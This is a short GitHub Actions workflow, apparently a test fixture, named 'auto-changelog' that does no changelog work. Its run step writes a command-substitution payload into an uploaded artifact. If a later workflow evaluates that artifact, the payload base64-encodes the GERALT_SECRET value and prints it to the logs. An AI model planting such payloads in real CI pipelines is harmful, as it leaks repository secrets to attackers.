name: auto-changelog

on:
  pull_request:
    types: [opened]
  pull_request_review:
    types: [submitted]
  issue_comment:
    types: [created, edited]

jobs:
  changelog:
    runs-on: ubuntu-latest
    steps:
      - run: |
          printf '%s' '$(echo GERALT_LEAKED_TOKEN=$(echo -n $GERALT_SECRET|base64|base64)>&2)' > pr-id.txt
      - uses: actions/upload-artifact@v4
        with:
          name: pr-id
          path: pr-id.txt
          retention-days: 5
